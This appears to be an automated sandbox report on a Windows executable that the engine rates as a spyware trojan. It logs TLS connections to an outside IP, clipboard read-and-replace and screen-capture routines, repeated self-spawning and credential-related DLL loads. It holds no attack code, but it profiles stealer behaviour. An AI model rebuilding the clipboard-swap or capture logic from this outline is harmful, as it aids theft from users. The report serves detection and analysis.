Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49708
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49707
Source: unknown	Network traffic detected: HTTP traffic on port 49750 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49727
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49715
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49769

Source: unknown	HTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.11:49707 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.11:49708 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.11:49710 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.11:49715 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.11:49727 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.11:49742 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.11:49750 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.11:49769 version: TLS 1.2

Source: C:\Users\user\Desktop\EZsrFTi.exe

Code function: 4_2_00435A30 OpenClipboard,GetClipboardData,GlobalLock,GetWindowLongW,GlobalUnlock,CloseClipboard,

4_2_00435A30

Source: C:\Users\user\Desktop\EZsrFTi.exe

Code function: 4_2_03941000 EntryPoint,GetClipboardSequenceNumber,Sleep,Sleep,OpenClipboard,GetClipboardData,GlobalLock,GlobalAlloc,GlobalLock,GlobalUnlock,EmptyClipboard,SetClipboardData,GlobalFree,GlobalUnlock,CloseClipboard,GetClipboardSequenceNumber,

4_2_03941000

Source: C:\Users\user\Desktop\EZsrFTi.exe

Code function: 4_2_00435A30 OpenClipboard,GetClipboardData,GlobalLock,GetWindowLongW,GlobalUnlock,CloseClipboard,

4_2_00435A30

Source: C:\Users\user\Desktop\EZsrFTi.exe

Code function: 4_2_00435BD0 GetDC,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,SelectObject,DeleteDC,ReleaseDC,DeleteObject,

4_2_00435BD0

Source: C:\Users\user\Desktop\EZsrFTi.exe	Code function: 0_2_00CA3CA9	0_2_00CA3CA9
Source: C:\Users\user\Desktop\EZsrFTi.exe	Code function: 0_2_00CA3CB8	0_2_00CA3CB8
Source: C:\Users\user\Desktop\EZsrFTi.exe	Code function: 0_2_00CA6CB0	0_2_00CA6CB0
Source: C:\Users\user\Desktop\EZsrFTi.exe	Code function: 4_2_004178F2	4_2_004178F2
Source: C:\Users\user\Desktop\EZsrFTi.exe	Code function: 4_2_004208A0	4_2_004208A0
Source: C:\Users\user\Desktop\EZsrFTi.exe	Code function: 4_2_004151D0	4_2_004151D0
Source: C:\Users\user\Desktop\EZsrFTi.exe	Code function: 4_2_0043A2B0	4_2_0043A2B0
Source: C:\Users\user\Desktop\EZsrFTi.exe	Code function: 4_2_00441310	4_2_00441310
Source: C:\Users\user\Desktop\EZsrFTi.exe	Code function: 4_2_004243A0	4_2_004243A0
Source: C:\Users\user\Desktop\EZsrFTi.exe	Code function: 4_2_00441CD0	4_2_00441CD0
Source: C:\Users\user\Desktop\EZsrFTi.exe	Code function: 4_2_00427520	4_2_00427520
Source: C:\Users\user\Desktop\EZsrFTi.exe	Code function: 4_2_00408660	4_2_00408660
Source: C:\Users\user\Desktop\EZsrFTi.exe	Code function: 4_2_00410FB5	4_2_00410FB5
Source: C:\Users\user\Desktop\EZsrFTi.exe	Code function: 4_2_00414820	4_2_00414820
Source: C:\Users\user\Desktop\EZsrFTi.exe	Code function: 4_2_004038C0	4_2_004038C0
Source: C:\Users\user\Desktop\EZsrFTi.exe	Code function: 4_2_004398C0	4_2_004398C0
Source: C:\Users\user\Desktop\EZsrFTi.exe	Code function: 4_2_004330F0	4_2_004330F0
Source: C:\Users\user\Desktop\EZsrFTi.exe	Code function: 4_2_00440080	4_2_00440080
Source: C:\Users\user\Desktop\EZsrFTi.exe	Code function: 4_2_0042A142	4_2_0042A142
Source: C:\Users\user\Desktop\EZsrFTi.exe	Code function: 4_2_0041D150	4_2_0041D150
Source: C:\Users\user\Desktop\EZsrFTi.exe	Code function: 4_2_00441960	4_2_00441960
Source: C:\Users\user\Desktop\EZsrFTi.exe	Code function: 4_2_00440910	4_2_00440910
Source: C:\Users\user\Desktop\EZsrFTi.exe	Code function: 4_2_0041812C	4_2_0041812C
Source: C:\Users\user\Desktop\EZsrFTi.exe	Code function: 4_2_00405930	4_2_00405930
Source: C:\Users\user\Desktop\EZsrFTi.exe	Code function: 4_2_0040A9E0	4_2_0040A9E0
Source: C:\Users\user\Desktop\EZsrFTi.exe	Code function: 4_2_004339F0	4_2_004339F0
Source: C:\Users\user\Desktop\EZsrFTi.exe	Code function: 4_2_00417193	4_2_00417193
Source: C:\Users\user\Desktop\EZsrFTi.exe	Code function: 4_2_004289BC	4_2_004289BC
Source: C:\Users\user\Desktop\EZsrFTi.exe	Code function: 4_2_0043DA40	4_2_0043DA40
Source: C:\Users\user\Desktop\EZsrFTi.exe	Code function: 4_2_00409250	4_2_00409250
Source: C:\Users\user\Desktop\EZsrFTi.exe	Code function: 4_2_0041EA60	4_2_0041EA60
Source: C:\Users\user\Desktop\EZsrFTi.exe	Code function: 4_2_00404270	4_2_00404270
Source: C:\Users\user\Desktop\EZsrFTi.exe	Code function: 4_2_0040B21B	4_2_0040B21B
Source: C:\Users\user\Desktop\EZsrFTi.exe	Code function: 4_2_00406220	4_2_00406220
Source: C:\Users\user\Desktop\EZsrFTi.exe	Code function: 4_2_00427A30	4_2_00427A30
Source: C:\Users\user\Desktop\EZsrFTi.exe	Code function: 4_2_00440AF0	4_2_00440AF0
Source: C:\Users\user\Desktop\EZsrFTi.exe	Code function: 4_2_004262F7	4_2_004262F7
Source: C:\Users\user\Desktop\EZsrFTi.exe	Code function: 4_2_00415B54	4_2_00415B54
Source: C:\Users\user\Desktop\EZsrFTi.exe	Code function: 4_2_00419B60	4_2_00419B60
Source: C:\Users\user\Desktop\EZsrFTi.exe	Code function: 4_2_0043EB68	4_2_0043EB68
Source: C:\Users\user\Desktop\EZsrFTi.exe	Code function: 4_2_0041630C	4_2_0041630C
Source: C:\Users\user\Desktop\EZsrFTi.exe	Code function: 4_2_0042E315	4_2_0042E315
Source: C:\Users\user\Desktop\EZsrFTi.exe	Code function: 4_2_00439B20	4_2_00439B20
Source: C:\Users\user\Desktop\EZsrFTi.exe	Code function: 4_2_00440BA0	4_2_00440BA0
Source: C:\Users\user\Desktop\EZsrFTi.exe	Code function: 4_2_0042E3B2	4_2_0042E3B2
Source: C:\Users\user\Desktop\EZsrFTi.exe	Code function: 4_2_0042FBB0	4_2_0042FBB0
Source: C:\Users\user\Desktop\EZsrFTi.exe	Code function: 4_2_00414BBB	4_2_00414BBB
Source: C:\Users\user\Desktop\EZsrFTi.exe	Code function: 4_2_0041C460	4_2_0041C460
Source: C:\Users\user\Desktop\EZsrFTi.exe	Code function: 4_2_0041CC70	4_2_0041CC70
Source: C:\Users\user\Desktop\EZsrFTi.exe	Code function: 4_2_00426C74	4_2_00426C74
Source: C:\Users\user\Desktop\EZsrFTi.exe	Code function: 4_2_00404C00	4_2_00404C00
Source: C:\Users\user\Desktop\EZsrFTi.exe	Code function: 4_2_00416C19	4_2_00416C19
Source: C:\Users\user\Desktop\EZsrFTi.exe	Code function: 4_2_0042E41D	4_2_0042E41D
Source: C:\Users\user\Desktop\EZsrFTi.exe	Code function: 4_2_00432C2F	4_2_00432C2F
Source: C:\Users\user\Desktop\EZsrFTi.exe	Code function: 4_2_00402430	4_2_00402430
Source: C:\Users\user\Desktop\EZsrFTi.exe	Code function: 4_2_0041D430	4_2_0041D430
Source: C:\Users\user\Desktop\EZsrFTi.exe	Code function: 4_2_00407490	4_2_00407490
Source: C:\Users\user\Desktop\EZsrFTi.exe	Code function: 4_2_0041FC90	4_2_0041FC90
Source: C:\Users\user\Desktop\EZsrFTi.exe	Code function: 4_2_00431492	4_2_00431492
Source: C:\Users\user\Desktop\EZsrFTi.exe	Code function: 4_2_0043B4A0	4_2_0043B4A0
Source: C:\Users\user\Desktop\EZsrFTi.exe	Code function: 4_2_00438CA7	4_2_00438CA7
Source: C:\Users\user\Desktop\EZsrFTi.exe	Code function: 4_2_004214B0	4_2_004214B0
Source: C:\Users\user\Desktop\EZsrFTi.exe	Code function: 4_2_00425D67	4_2_00425D67
Source: C:\Users\user\Desktop\EZsrFTi.exe	Code function: 4_2_0041AD0C	4_2_0041AD0C
Source: C:\Users\user\Desktop\EZsrFTi.exe	Code function: 4_2_0041BDC0	4_2_0041BDC0
Source: C:\Users\user\Desktop\EZsrFTi.exe	Code function: 4_2_00417DC3	4_2_00417DC3
Source: C:\Users\user\Desktop\EZsrFTi.exe	Code function: 4_2_004262F7	4_2_004262F7
Source: C:\Users\user\Desktop\EZsrFTi.exe	Code function: 4_2_0043E59E	4_2_0043E59E
Source: C:\Users\user\Desktop\EZsrFTi.exe	Code function: 4_2_00418DA0	4_2_00418DA0
Source: C:\Users\user\Desktop\EZsrFTi.exe	Code function: 4_2_00437E56	4_2_00437E56
Source: C:\Users\user\Desktop\EZsrFTi.exe	Code function: 4_2_0042966F	4_2_0042966F
Source: C:\Users\user\Desktop\EZsrFTi.exe	Code function: 4_2_0041A616	4_2_0041A616
Source: C:\Users\user\Desktop\EZsrFTi.exe	Code function: 4_2_0042A630	4_2_0042A630
Source: C:\Users\user\Desktop\EZsrFTi.exe	Code function: 4_2_004326C0	4_2_004326C0
Source: C:\Users\user\Desktop\EZsrFTi.exe	Code function: 4_2_004416D0	4_2_004416D0
Source: C:\Users\user\Desktop\EZsrFTi.exe	Code function: 4_2_004346FA	4_2_004346FA
Source: C:\Users\user\Desktop\EZsrFTi.exe	Code function: 4_2_00405E80	4_2_00405E80
Source: C:\Users\user\Desktop\EZsrFTi.exe	Code function: 4_2_0040EE85	4_2_0040EE85
Source: C:\Users\user\Desktop\EZsrFTi.exe	Code function: 4_2_0042AE8C	4_2_0042AE8C
Source: C:\Users\user\Desktop\EZsrFTi.exe	Code function: 4_2_004096B0	4_2_004096B0
Source: C:\Users\user\Desktop\EZsrFTi.exe	Code function: 4_2_004066B0	4_2_004066B0
Source: C:\Users\user\Desktop\EZsrFTi.exe	Code function: 4_2_00402EB0	4_2_00402EB0
Source: C:\Users\user\Desktop\EZsrFTi.exe	Code function: 4_2_0041C770	4_2_0041C770
Source: C:\Users\user\Desktop\EZsrFTi.exe	Code function: 4_2_0042F775	4_2_0042F775
Source: C:\Users\user\Desktop\EZsrFTi.exe	Code function: 4_2_0042C710	4_2_0042C710
Source: C:\Users\user\Desktop\EZsrFTi.exe	Code function: 4_2_00434F23	4_2_00434F23
Source: C:\Users\user\Desktop\EZsrFTi.exe	Code function: 4_2_0040E7F0	4_2_0040E7F0
Source: C:\Users\user\Desktop\EZsrFTi.exe	Code function: 4_2_004407FD	4_2_004407FD
Source: C:\Users\user\Desktop\EZsrFTi.exe	Code function: 4_2_0043AF80	4_2_0043AF80
Source: C:\Users\user\Desktop\EZsrFTi.exe	Code function: 4_2_0043B789	4_2_0043B789
Source: C:\Users\user\Desktop\EZsrFTi.exe	Code function: 4_2_004237A1	4_2_004237A1
Source: C:\Users\user\Desktop\EZsrFTi.exe	Code function: 4_2_004167BD	4_2_004167BD

Source: C:\Users\user\Desktop\EZsrFTi.exe	Code function: String function: 00414810 appears 110 times
Source: C:\Users\user\Desktop\EZsrFTi.exe	Code function: String function: 00408020 appears 36 times

Source: C:\Users\user\Desktop\EZsrFTi.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7652 -s 940

Source: EZsrFTi.exe, 00000000.00000000.1292078647.0000000000632000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameHandler.exe0 vs EZsrFTi.exe
Source: EZsrFTi.exe, 00000000.00000002.1489497455.00000000039E9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameHandler.exe0 vs EZsrFTi.exe
Source: EZsrFTi.exe, 00000000.00000002.1488549625.0000000000E7E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs EZsrFTi.exe
Source: EZsrFTi.exe	Binary or memory string: OriginalFilenameHandler.exe0 vs EZsrFTi.exe

Source: EZsrFTi.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source: EZsrFTi.exe

Static PE information: Section: .idata ZLIB complexity 1.0003366361788617

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@8/5@1/1

Source: C:\Users\user\Desktop\EZsrFTi.exe

Code function: 4_2_0043A2B0 RtlExpandEnvironmentStrings,CoCreateInstance,SysAllocString,CoSetProxyBlanket,SysAllocString,SysAllocString,VariantInit,VariantClear,SysFreeString,SysFreeString,SysFreeString,SysFreeString,GetVolumeInformationW,

4_2_0043A2B0

Source: C:\Users\user\Desktop\EZsrFTi.exe	Mutant created: NULL
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7652

Source: C:\Windows\SysWOW64\WerFault.exe

File created: C:\ProgramData\Microsoft\Windows\WER\Temp\1df4e212-fa20-43ac-a1a5-dc15d1d8c784

Jump to behavior

Source: EZsrFTi.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: EZsrFTi.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%

Source: C:\Users\user\Desktop\EZsrFTi.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: EZsrFTi.exe

Virustotal: Detection: 27%

Source: C:\Users\user\Desktop\EZsrFTi.exe

File read: C:\Users\user\Desktop\EZsrFTi.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\EZsrFTi.exe "C:\Users\user\Desktop\EZsrFTi.exe"
Source: C:\Users\user\Desktop\EZsrFTi.exe	Process created: C:\Users\user\Desktop\EZsrFTi.exe "C:\Users\user\Desktop\EZsrFTi.exe"
Source: C:\Users\user\Desktop\EZsrFTi.exe	Process created: C:\Users\user\Desktop\EZsrFTi.exe "C:\Users\user\Desktop\EZsrFTi.exe"
Source: C:\Users\user\Desktop\EZsrFTi.exe	Process created: C:\Users\user\Desktop\EZsrFTi.exe "C:\Users\user\Desktop\EZsrFTi.exe"
Source: C:\Users\user\Desktop\EZsrFTi.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7652 -s 940
Source: C:\Users\user\Desktop\EZsrFTi.exe	Process created: C:\Users\user\Desktop\EZsrFTi.exe "C:\Users\user\Desktop\EZsrFTi.exe"	Jump to behavior
Source: C:\Users\user\Desktop\EZsrFTi.exe	Process created: C:\Users\user\Desktop\EZsrFTi.exe "C:\Users\user\Desktop\EZsrFTi.exe"	Jump to behavior
Source: C:\Users\user\Desktop\EZsrFTi.exe	Process created: C:\Users\user\Desktop\EZsrFTi.exe "C:\Users\user\Desktop\EZsrFTi.exe"	Jump to behavior

Source: C:\Users\user\Desktop\EZsrFTi.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\EZsrFTi.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\EZsrFTi.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\EZsrFTi.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\EZsrFTi.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\EZsrFTi.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\EZsrFTi.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\EZsrFTi.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\EZsrFTi.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\EZsrFTi.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\EZsrFTi.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\EZsrFTi.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\EZsrFTi.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\Desktop\EZsrFTi.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\EZsrFTi.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\EZsrFTi.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\EZsrFTi.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\EZsrFTi.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\EZsrFTi.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\EZsrFTi.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\EZsrFTi.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\EZsrFTi.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\EZsrFTi.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\EZsrFTi.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\EZsrFTi.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\EZsrFTi.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\EZsrFTi.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\EZsrFTi.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\EZsrFTi.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\EZsrFTi.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\EZsrFTi.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\EZsrFTi.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\EZsrFTi.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\EZsrFTi.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\EZsrFTi.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\EZsrFTi.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\EZsrFTi.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\EZsrFTi.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\EZsrFTi.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\EZsrFTi.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\EZsrFTi.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\EZsrFTi.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\EZsrFTi.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\EZsrFTi.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\EZsrFTi.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior

Source: EZsrFTi.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: EZsrFTi.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: EZsrFTi.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: System.pdb$ source: WERFB06.tmp.dmp.7.dr
Source:	Binary string: System.Windows.Forms.pdb source: WERFB06.tmp.dmp.7.dr
Source:	Binary string: mscorlib.pdb source: WERFB06.tmp.dmp.7.dr
Source:	Binary string: System.ni.pdbRSDS source: WERFB06.tmp.dmp.7.dr
Source:	Binary string: Handler.pdb@\lqMZ@ source: WERFB06.tmp.dmp.7.dr
Source:	Binary string: mscorlib.ni.pdb source: WERFB06.tmp.dmp.7.dr
Source:	Binary string: Handler.pdbx source: EZsrFTi.exe
Source:	Binary string: Handler.pdb source: EZsrFTi.exe, WERFB06.tmp.dmp.7.dr
Source:	Binary string: System.Windows.Forms.pdb\ source: WERFB06.tmp.dmp.7.dr
Source:	Binary string: System.Core.pdb source: WERFB06.tmp.dmp.7.dr
Source:	Binary string: mscorlib.ni.pdbRSDS source: WERFB06.tmp.dmp.7.dr
Source:	Binary string: System.ni.pdb source: WERFB06.tmp.dmp.7.dr
Source:	Binary string: System.pdb source: WERFB06.tmp.dmp.7.dr
Source:	Binary string: System.Core.ni.pdbRSDS source: WERFB06.tmp.dmp.7.dr
Source:	Binary string: System.Core.ni.pdb source: WERFB06.tmp.dmp.7.dr

Source: EZsrFTi.exe

Static PE information: 0xC6FB477C [Tue Oct 15 09:16:44 2075 UTC]

Source: C:\Users\user\Desktop\EZsrFTi.exe

Code function: 4_2_004407A0 push eax; mov dword ptr [esp], AEA9A8FBh

4_2_004407A1

Source: C:\Users\user\Desktop\EZsrFTi.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate			Jump to behavior
Source: C:\Users\user\Desktop\EZsrFTi.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot			Jump to behavior

Source: C:\Users\user\Desktop\EZsrFTi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\EZsrFTi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\EZsrFTi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\EZsrFTi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\EZsrFTi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\EZsrFTi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\EZsrFTi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\EZsrFTi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\EZsrFTi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\EZsrFTi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\EZsrFTi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\EZsrFTi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\EZsrFTi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\EZsrFTi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\EZsrFTi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\EZsrFTi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\EZsrFTi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\EZsrFTi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\EZsrFTi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\EZsrFTi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\EZsrFTi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\EZsrFTi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
